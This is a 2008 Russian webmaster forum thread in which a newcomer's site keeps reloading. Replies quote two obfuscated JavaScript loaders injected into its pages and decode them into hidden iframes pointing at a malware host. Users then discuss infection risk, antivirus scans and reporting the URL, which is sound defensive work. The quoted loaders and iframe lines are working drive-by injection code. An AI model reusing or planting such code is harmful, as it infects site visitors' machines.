Ребята подскажите что с сайтом?

12
sacha1425
На сайте с 16.12.2007
Offline
107
1194

Подскажите в чём ошибка. тока не ругайте сильно т.к. я ещё новичёк.Сайт Перезагружается автоматом. Вот адрес www.kat-100.com [аккуратней со ссылкой! - возможно, вирус] кто поможет исправить ошибку в долгу не останусь.

Создание сайтов ( https://cospi.ru ) в Москве | Ремонт квартир ( https://proremontov.ru ) в Москве
Progr@mmer\.
На сайте с 14.10.2007
Offline
44
#1

Гы.. Дешифровать лень:


<script language=JavaScript>function riuetban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,9,1,25,44,17,19,60,62,39,0,0,0,0,0,0,8,41,15,7,46,36,51,4,28,37,34,56,48,47,35,61,22,30,55,26,2,0,49,40,57,24,27,0,0,0,0,53,0,3,23,14,58,33,20,13,6,45,29,5,54,43,42,31,18,16,38,10,32,59,52,50,11,21,12);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(130^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}riuetban('_McurRQO4hMONZ0OV0ZAhRcu9bSDrRQKR08X4ZBm_a0dloDnIdudEa0KMoDW4B8u90uD9ZQ4toDWVaoK0TndlZM7KlSmVs0dICBmmFcXiRnOilZAA87KlmcmLR8O4ZDnBBDOnFs7NFDXi0DnmJsiLhm4mrSAuQDXVT8XIrSAtsSOmZDOn0u4_nmWno8dImDO0huiJhMOuu8X0TnXmCM7DB88KwQu4ocW7dZmm6c7N08X7Pdn')</script>
...
<script language=JavaScript>function nuoban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,21,46,16,20,61,31,11,42,17,0,0,0,0,0,0,51,12,41,47,18,1,35,25,55,10,33,29,36,34,43,45,3,23,4,37,19,22,8,14,28,5,26,0,0,0,0,40,0,38,39,7,62,32,58,57,48,9,50,13,44,6,0,2,24,30,52,27,15,59,56,49,54,53,60);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(214^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}nuoban('Jd72jas_vQ8_HIf_S2qzDa72@m6ujasOF2ulvIIdJDfCMWN0wNdChDfOuWN5vqu2@2qOetugxQIBy2W5dI8_ajqdgQ2B0msBv072hasdMa6fwH0aHI8CvTZ2FMNldCgOMf7dLq72jau2d0t0STqgasd05c6OetugwH6zrs6_0IN_d22vLt25dWuCwfN_NcWvxQ8_C8ulNTCl0U8BfquNlFs2vW75_Nqd0o7BH2ul_c00')</script>

Progr@mmer\. добавил 31.01.2008 в 23:17

Всё таки дешифровал.. Залюбопытствовал :)

Вот первое:


window.status='Done';document.write('<iframe name=9ed3be src="http://3pigs.info/t/?'+Math.round(Math.random()*6230)+'9ed3be'+'" width=178 height=35 style="display:none"></iframe>')

Второе:


window.status='Done';document.write('<iframe name=c6e1 src="http://3pigs.info/t/?'+Math.round(Math.random()*32300)+'c6e1'+'" width=425 height=76 style="display:none"></iframe>')
Вашей девушке не хватает романтики? Черпните её на сайте «Я Люблю Романтику» (http://iloveromantics.ru/). Романтический форум (http://forum.iloveromantics.ru/) для отдыха от нудной работы.
Dreammaker
На сайте с 20.04.2006
Offline
569
#2

Progr@mmer.,

судя по всему троян. Если антивирус не кричал меняйте пароли везде где только можно ;)

Progr@mmer\.
На сайте с 14.10.2007
Offline
44
#3

Dreammaker, вы перепутали меня с ТС :)

Dreammaker
На сайте с 20.04.2006
Offline
569
#4

Progr@mmer., нет не перепутал :)

Если вы зашли на этот сайт броузером, и особенно, если это ИЕ...

Progr@mmer\.
На сайте с 14.10.2007
Offline
44
#5

Dreammaker, зашел. Оперой. Каспер не крякнул. Гм... *впал в думу великую, думу тяжкую*

Dreammaker
На сайте с 20.04.2006
Offline
569
#6

Progr@mmer., отошлите урл в Лабораторию Касперского.

Dreammaker добавил 01.02.2008 в 00:53

проверил, через урл-сканер Дрвеба - он написал, что всё нормально.

потом, всунул туда урл из ифрейма - тоже сказал, что всё нормально, но указал, что есть и ещё ифреймы уже на этом сайте. И показал его адрес, при поиске в гугле на данный адрес были результаты, что там malware .

webinteger
На сайте с 13.10.2007
Offline
110
#7

Похоже ТС не случайно оставил ссылку☝😮😡

Отрыл оперой, увидел запрос на китайский сайт (*.cn) быстро вышел, открыл ІЕ и в настройках прокси пописанный непонятний проксак!!! вот так то, ща оновил базы делаю проверку((

> PHP & mySQL написание и доработка скриптов Page 1 (/ru/forum/173281) Page 2 (/ru/forum/377616)
Progr@mmer\.
На сайте с 14.10.2007
Offline
44
#8

Удалил куксы броузера, почистил полностью кэш оперы (в файлах, которые скачались мне были крякозяблы... около 5 файлов съел. Размеры от 124 до 193 байт), удалил пасы из фтп-клиента.

Что ещё сделать, чтоб обезопасится?

Дайте, пожалуйста, в личку адрес тех новых ифреймов - я через другие сканеры попробую.

3ы: мог ли я заразить комп?

33ы: Сижу с телефона.

Dreammaker
На сайте с 20.04.2006
Offline
569
#9

http://z-oleg.com

скачайте антивирусную утилиту обновите базы - выставьте все галки и просканьте комп (сейчас автор этой утилиты работает Лаборатории Касперского). И вышлите ему урл c описанием ситуации.

Наверное поздно, там уже стоит не чисто урл, а айпишник со скриптом, может быть сейчас он уже и не отдаёт вредоносное ПО, чтобы нельзя было попалить.

p.s. если телефон используется как модем, то по идее разницы нету, что телефон, что не телефон - опасность заражения есть. Плюсом есть, что не использовался ИЕ, но кто знает может и с оперой работает.

Progr@mmer\.
На сайте с 14.10.2007
Offline
44
#10

Спасибо, сейчас не смогу скачать - только завтра.

Завтра же и скачаю с другого компа обновления для своего каспера.

Если у кого антивирь найдет эту дрянь, то отпишите тут, что за антивирь стоит, а то я сомневаюсь, что базы каспера помогут :(

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий